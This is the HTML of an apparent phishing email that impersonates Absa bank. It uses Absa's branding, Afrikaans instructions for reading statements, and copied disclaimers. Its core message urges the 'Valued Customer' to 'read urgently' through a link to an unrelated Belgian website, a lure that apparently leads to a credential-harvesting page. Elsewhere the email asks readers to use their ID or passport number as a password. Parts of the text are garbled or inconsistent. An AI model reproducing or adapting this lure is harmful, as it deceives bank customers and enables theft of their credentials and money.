<html>

<head>
 
 
 
<title>Important</title>

</head>

 

<table width="652" align="center" border="0" cellpadding="0" cellspacing="0">
  <tbody>
    <tr>

      <td>
        <table width="652" align="center" bgcolor="#d11a1a" border="0" cellpadding="0" cellspacing="0">
          <tbody>
            <tr>

              <td>
                <table width="650" align="center" bgcolor="#f7f7f7" border="0" cellpadding="0" cellspacing="0">
                  <tbody>
                    <tr>
                      <td><img src="http://clients.striata.com/absa/Banner.gif" alt border="0" width="650" height="85"></td>

                    </tr>
                    <tr>
                      <td>

                        <table width="100%" border="0" cellpadding="5" cellspacing="0">
                          <tbody>
                            <tr>
                              <td valign="top">
                                <table width="100%" border="0" cellpadding="0" cellspacing="0">
                                  <tbody>

                                    <tr>
                                      <td class="yiv964265229EC_Content" width="400" valign="top"><b>Dear Valued Customer</b><br>

                                        <br>
                                        This is a notification from Notifyme, <a href="http://www.objectif13.be/images/icon/default/direct/consolidation/complete/index.php">
read urgently </a><br>
                                        
                                        <br>

                                        Met vriendelike groete<br>
                                        <font color="#d11a1a">Absa Digital
                                        Channels</font><br>

                                        <br>
                                        <img src="http://clients.striata.com/absa/TBarclays-Afr.gif" alt border="0" width="180" height="17"><br>
                                        <br>
                                      </td>
                                      <td class="yiv964265229EC_Text" width="10"> </td>
                                      <td width="230" valign="top">

                                        <table width="230" bgcolor="#d11a1a" border="0" cellpadding="0" cellspacing="0">
                                          <tbody>

                                            <tr>
                                              <td height="1"> </td>
                                            </tr>
                                            <tr>
                                              <td align="center">
                                                <table width="228" bgcolor="#ffffff" border="0" cellpadding="5" cellspacing="0">
                                                  <tbody>

                                                    <tr>

                                                      <td align="center"><img src="http://clients.striata.com/absa/kryStriataLeser.gif" alt width="175" border="0" height="27"></td>
                                                    </tr>
                                                    <tr>
                                                      <td class="yiv964265229EC_Text"><font color="#d11a1a"><b>Installering
                                                        van die Striata-leser.</b><br>
                                                        </font><b>Stap 1:</b>
                                                        Skakel in op die
                                                        internet.<br>

                                                        <b>Stap 2:</b> Laai die
                                                        leser van die
                                                        Striata-webwerf af
                                                        (58Kb): Gaan na <font color="#d11a1a">www.striata.com/absa</font>

                                                        en klik op ‘Striata
                                                        Reader’ in die
                                                        regterkantste hoek.
                                                        bokant die soek boks.<br>
                                                        <b>Stap 3:</b> Klik op
                                                        die oranje opskrif. Die
                                                        opskrif sal verskil
                                                        afhangende van die
                                                        bedryfstelsel wat jou
                                                        rekenaar gabbroic.<br>
                                                        <b>Stap 4:</b> Kies
                                                        'Open/Run'. Indien daar
                                                        nie 'n 'Open/Run'-opsie
                                                        gegee word nie, kies
                                                        'Save' en dan 'Open'.<br>

                                                        <b>Stap 5:</b> Die leser
                                                        is nou geďnstalleer.
                                                        Kies ‘OK’ om die
                                                        ‘install
                                                        confirmation’-dialoogblokkie
                                                        toe te maak.<br>
                                                        <br>
                                                        <font color="#d11a1a"><b>Oopmaak
                                                        van die geënkodeerde
                                                        staat</b><br>
                                                        </font><b>Stap 6:</b>
                                                        Dubbelklik op die
                                                        digitaal getekende
                                                        aanhegsel. U sal
                                                        aangepor word om 'n
                                                        wagwoord in te tik (u
                                                        ID-/paspoortnommer).<br>

                                                        <br>

                                                        <font color="#d11a1a"><b>Installering
                                                        van die Adobe Leser</b></font><br>
                                                        Om u staat oop te maak,
                                                        het u Adobe Reader v 5.0
                                                        of hoër nodig. Indien u
                                                        nie Adobe Reader het
                                                        nie, klik asseblief <font color="#d11a1a">http://get.adobe.com/reader/</font>
                                                        om die jongste weergawe
                                                        af te laai.</td>
                                                    </tr>
                                                  </tbody>

                                                </table>
                                              </td>

                                            </tr>
                                            <tr>
                                              <td height="1"> </td>
                                            </tr>
                                          </tbody>
                                        </table>

                                      </td>
                                    </tr>
                                  </tbody>

                                </table>
                              </td>
                            </tr>
                          </tbody>
                        </table>

                      </td>
                    </tr>
                  </tbody>
                </table>

              </td>
            </tr>
            <tr>
              <td>

                <table width="650" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                  <tbody>
                    <tr>
                      <td>
                        <table width="640" bgcolor="#d11a1a" border="0" cellpadding="0" cellspacing="0">

                          <tbody>
                            <tr>
                              <td height="1"> </td>

                            </tr>
                            <tr>
                              <td>
                                <table width="638" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                                  <tbody>
                                    <tr>

                                      <td>
                                        <table width="628" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">

                                          <tbody>
                                            <tr>
                                              <td class="yiv964265229EC_Text"><font color="#d11a1a"><b>Riglyne
                                                vir elektroniesestaat-gebruikers</b><br>
                                                <br>
                                                </font>
                                                <table width="100%" border="0" cellpadding="0" cellspacing="0">

                                                  <tbody>
                                                    <tr>

                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Elektroniese
                                                        state kan ontvang of
                                                        herwin word en daar is
                                                        geen bykomende koste aan
                                                        hierdie diens verbonde
                                                        nie.</td>
                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Kliënte
                                                        wat hierdie elektroniese
                                                        fasiliteit gebruik en
                                                        die e-posadres wil
                                                        verander of na gedrukte
                                                        state wil terugkeer, kan
                                                        Absa in kennis stel deur
                                                        die tak te kontak of om
                                                        die instelling direk op
                                                        Internetbankdienste te
                                                        verander.</td>

                                                    </tr>

                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">State
                                                        sal óf in Engels óf in
                                                        Afrikaans beskikbaar
                                                        wees na gelang van u
                                                        taalvoorkeur.</td>
                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Absa
                                                        sal state slegs na die
                                                        e-posadresse stuur wat
                                                        deur u gespesifiseer is.</td>

                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Dit is
                                                        u uitsluitlike
                                                        verantwoordelikheid om
                                                        te verseker dat geen
                                                        ongemagtigde persoon
                                                        en/of derde party
                                                        toegang tot u e-pos of
                                                        wagwoord het nie. In die
                                                        geval waar 'n
                                                        ongemagtigde persoon
                                                        en/of derde party
                                                        toegang tot u e-pos of
                                                        wagwoord verkry, sal
                                                        Absa onder geen
                                                        omstandighede hoegenaamd
                                                        aanspreeklik gehou word
                                                        vir enige verlies of
                                                        skade wat gely is as
                                                        gevolg van u vertroulike
                                                        inligting wat
                                                        bekendgemaak is nie.</td>
                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>

                                                      <td class="yiv964265229EC_Text">U sal
                                                        die elektroniese state
                                                        ontvang omdat u die
                                                        bepalings vir die
                                                        ontvangs van die state
                                                        aanvaar het. Indien u
                                                        hulle weer wil besigtig,
                                                        klik asseblief op <font color="#d11a1a"><a rel="nofollow" target="_blank" href="http://www.absa.co.za/absacoza/generated/files/35a63429edec7110VgnVCM1000003511060aRCRD/Bepalings%20en%20Voorwaardes.pdf">Bepalings
                                                        en Voorwaardes</a></font></td>

                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Vir
                                                        enige eposnavrae oor
                                                        elektroniese state,
                                                        kontak asseblIef <font color="#d11a1a">officialemail@absa.co.za</font>
                                                        of kontak die
                                                        kontaksentrum by 0860
                                                        008 600 en kies opsie
                                                        nommer 2.</td>

                                                    </tr>
                                                    <tr>

                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text"><b>Vir
                                                        enige navrae oor u
                                                        rekening of navrae oor
                                                        die transaksies op die
                                                        staat, gebruik asseblief
                                                        die kontakbesonderhede
                                                        wat op die staat getoon
                                                        word.</b></td>
                                                    </tr>
                                                  </tbody>
                                                </table>
                                              </td>

                                            </tr>
                                          </tbody>

                                        </table>
                                      </td>
                                    </tr>
                                  </tbody>
                                </table>
                              </td>

                            </tr>
                            <tr>
                              <td height="1"> </td>

                            </tr>
                          </tbody>
                        </table>
                      </td>
                    </tr>

                  </tbody>
                </table>
              </td>
            </tr>

            <tr>
              <td>
                <table width="650" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                  <tbody>

                    <tr>
                      <td>
                        <table width="640" bgcolor="#d11a1a" border="0" cellpadding="0" cellspacing="0">
                          <tbody>
                            <tr>

                              <td height="1"> </td>
                            </tr>
                            <tr>

                              <td>
                                <table width="638" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                                  <tbody>
                                    <tr>
                                      <td>
                                        <table width="628" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">

                                          <tbody>
                                            <tr>

                                              <td class="yiv964265229EC_Text"><font color="#d11a1a"><b>Besigtig
                                                u elektroniese staat</b><br>
                                                <br>
                                                </font>
                                                <table width="100%" border="0" cellpadding="0" cellspacing="0">
                                                  <tbody>
                                                    <tr>

                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Dubbelklik
                                                        op die "staat.emc"-aanhegsel.</td>

                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Kies
                                                        die “Open”-opsie.
                                                        Klik “OK”.</td>
                                                    </tr>

                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Om
                                                        veiligheidsredes sal u
                                                        geënkodeerde e-posse
                                                        ontvang op die e-posadresse
                                                        wat u voorsien het. U
                                                        sal versoek word om ’n
                                                        <b>wagwoord</b> in te
                                                        sleutel.</td>

                                                    </tr>
                                                    <tr>
                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">Om
                                                        toegang tot u
                                                        persoonlike
                                                        elektroniesestaat te
                                                        verkry, is die wagwoord:
                                                        u <b>ID-/paspoortnommer.</b>

                                                        Klik “OK”</td>
                                                    </tr>
                                                    <tr>

                                                      <td valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text">U
                                                        blaaier sal open en u
                                                        elektroniesestaat
                                                        vertoon.</td>
                                                    </tr>
                                                    <tr>
                                                      <td colspan="2" class="yiv964265229EC_Text"><br>

                                                        Om algehele
                                                        vertroulikheid te
                                                        verseker, klik
                                                        "OK" wanneer
                                                        die "Striata
                                                        Leser"-blokkie u in
                                                        kennis stel dat die
                                                        staatdata van die
                                                        tydelike lęer verwyder
                                                        gaan word.<br>

                                                        <br>
                                                        Indien u verkies om u
                                                        state te bewaar, kan u
                                                        dit druk of vir
                                                        toekomstige besigtiging
                                                        stoor. Neem asseblief
                                                        kennis dat hoewel u
                                                        enige druk- of
                                                        stoornavrae na ons
                                                        Tegniese Hulplyn by 0860
                                                        008 600 kan verwys, is
                                                        dit die kliënt se
                                                        verantwoordelikheid om
                                                        state te druk of te
                                                        stoor. Absa kan nie
                                                        aanspreeklik gehou word
                                                        indien die kliënt nie
                                                        in staat is om state te
                                                        druk of te stoor nie.<br>
                                                      </td>
                                                    </tr>

                                                  </tbody>
                                                </table>
                                              </td>

                                            </tr>
                                          </tbody>
                                        </table>
                                      </td>
                                    </tr>
                                  </tbody>

                                </table>
                              </td>

                            </tr>
                            <tr>
                              <td height="1"> </td>
                            </tr>
                          </tbody>
                        </table>
                      </td>

                    </tr>

                  </tbody>
                </table>
              </td>
            </tr>
            <tr>
              <td>
                <table width="650" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                  <tbody>

                    <tr>
                      <td>
                        <table width="640" bgcolor="#d11a1a" border="0" cellpadding="0" cellspacing="0">
                          <tbody>
                            <tr>
                              <td height="1"> </td>
                            </tr>
                            <tr>
                              <td>

                                <table width="638" align="center" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                                  <tbody>
                                    <tr>
                                      <td>
                                        <table width="628" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">
                                          <tbody>
                                            <tr>
                                              <td width="35"><img src="http://clients.striata.com/absa/Certif.jpg" alt border="0" width="28" height="45"></td>

                                              <td class="yiv964265229EC_Text"><b>U het
                                                moontlik 'n rooi roset in die
                                                boonste regterkantste hoek van
                                                hierdie e-pos opgemerk. Dit is
                                                'n digitale sertifikaat en die
                                                doel daarvan is om die
                                                integriteit en oorsprong van
                                                hierdie e-pos te verifieer. Neem
                                                asseblief kennis:</b><br>

                                                <br>
                                              </td>
                                            </tr>
                                          </tbody>
                                        </table>
                                        <table width="628" bgcolor="#f7f7f7" border="0" cellpadding="5" cellspacing="0">

                                          <tbody>
                                            <tr>
                                              <td>

                                                <table width="100%" border="0" cellpadding="0" cellspacing="0">
                                                  <tbody>
                                                    <tr>
                                                      <td width="12" valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text" valign="top">Dit
                                                        beteken dat hierdie
                                                        boodskap digitaal deur
                                                        die afsender geteken is.<br>

                                                      </td>
                                                    </tr>
                                                    <tr>

                                                      <td width="12" valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text" valign="top">As
                                                        dit u eerste digitaal
                                                        getekende e-pos is en
                                                        die klik op die roset
                                                        gee u 'n waarskuwing, is
                                                        dit moontlik dat u e-posbediener
                                                        die handtekening
                                                        ontsyfer het. Verwys dit
                                                        asseblief na u IT-departement
                                                        voordat u dit aan <font color="#d11a1a">brokendigitalcertificate@absa.co.za</font>
                                                        rapporteer.</td>

                                                    </tr>
                                                    <tr>
                                                      <td width="12" valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text" valign="top">Indien
                                                        daar met die inhoud van
                                                        die boodskap gepeuter
                                                        is, sal u 'n
                                                        sekuriteitswaarskuwing
                                                        ontvang wanneer u die
                                                        e-pos oopmaak om u te
                                                        waarsku dat daar met die
                                                        boodskap gepeuter kon
                                                        gewees het, of nie van
                                                        die veronderstelde
                                                        afsender kom nie.<br>

                                                      </td>
                                                    </tr>
                                                    <tr>

                                                      <td width="12" valign="top"><img src="http://clients.striata.com/absa/dot.gif" alt border="0" width="7" height="9"></td>
                                                      <td class="yiv964265229EC_Text" valign="top">Indien
                                                        u die sender se digitale
                                                        identifikasie wil
                                                        verifieer, klik
                                                        eenvoudig op die
                                                        rooilint-ikoon en kies
                                                        die opsie om die
                                                        digitaal getekende
                                                        identifikasie, of die
                                                        sertifikaat te besigtig.<br>
                                                      </td>
                                                    </tr>
                                                  </tbody>

                                                </table>
                                              </td>
                                            </tr>

                                          </tbody>
                                        </table>
                                      </td>
                                    </tr>
                                  </tbody>
                                </table>

                              </td>
                            </tr>

                            <tr>
                              <td height="1"> </td>
                            </tr>
                          </tbody>
                        </table>
                      </td>
                    </tr>

                  </tbody>

                </table>
              </td>
            </tr>
            <tr>
              <td><img src="http://clients.striata.com/absa/footer.gif" alt border="0" width="650" height="22"></td>
            </tr>
            <tr>
              <td height="1"> </td>

            </tr>
            <tr>
              <td class="yiv964265229EC_TText" bgcolor="#ffffff">
                <table width="100%" border="0" cellpadding="5" cellspacing="0">
                  <tbody>
                    <tr>
                      <td class="yiv964265229EC_TTExt"><b>Belangrike Kennisgewing:</b> Absa
                        Bank Bpk is 'n gemagtigde finansiëlediensteverskaffer,
                        registrasieno. 292.<br>

                        <br>
                        Belangrike beperkings, vereistes en vrywarings
                        ("die Vrywaring") is op hierdie e-pos van
                        toepassing. Om dit te lees, klik op die volgende adres
                        of kopieer na u Internet-blaaier.<br>
                        <br>
                        <font color="#d11a1a">www.absa.co.za/disclaimer</font><br>
                        <br>
                        Die Vrywaring maak deel uit van die inhoud van hierdie
                        e-pos kragtens artikel 11 van die Wet op Elektroniese
                        Kommunikasie en Transaksies, 25 van 2005. Indien u nie
                        toegang tot die Vrywaring kan verkry nie, stuur 'n leë
                        e-pos na <font color="#d11a1a">disclaimer@absa.co.za</font>

                        en ons sal 'n kopie van die Vrywaring aan u stuur.<br>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </td>
            </tr>

          </tbody>

        </table>
      </td>
    </tr>
  </tbody>
</table>
<hr>
<div>
  <font face="Arial" size="2">Important Notice:<br>

   <br>
  Absa is an Authorised Financial Services Provider and Registered Credit
  Provider,<br>

  registration number: NCRCP7.<br>
   <br>
  This e-mail and any files transmitted with it are confidential and intended
  for the use of<br>
  the individual or entity to whom they are addressed.<br>

   <br>
  Please note that there are terms and conditions and some important
  restrictions,<br>
  qualifications and disclaimers ("the Disclaimer") that apply to this
  email. To read this<br>

  click on the following address or copy into your Internet browser:<br>
   <br>
  </font><a rel="nofollow" target="_blank" href="http://www.absa.co.za/disclaimer"><font face="Arial" size="2">http://www.absa.co.za/disclaimer</font></a><br>

  <font face="Arial" size="2"> <br>
  The Disclaimer forms part of the content of this email in terms of<br>
  section 11 of the Electronic Communications and Transactions<br>
  Act, 25 of 2002.<br>

   <br>
  If you are unable to access the Disclaimer, send a blank e-mail<br>

  to </font><a rel="nofollow" ymailto="mailto:disclaimer@absa.co.za" target="_blank" href="/mc/compose?to=disclaimer@absa.co.za"><font face="Arial" size="2">disclaimer@absa.co.za</font></a><font face="Arial" size="2">
  and we will send you a copy of the<br>
  Disclaimer.</font>
</div>
<div>

</div>

 

</html>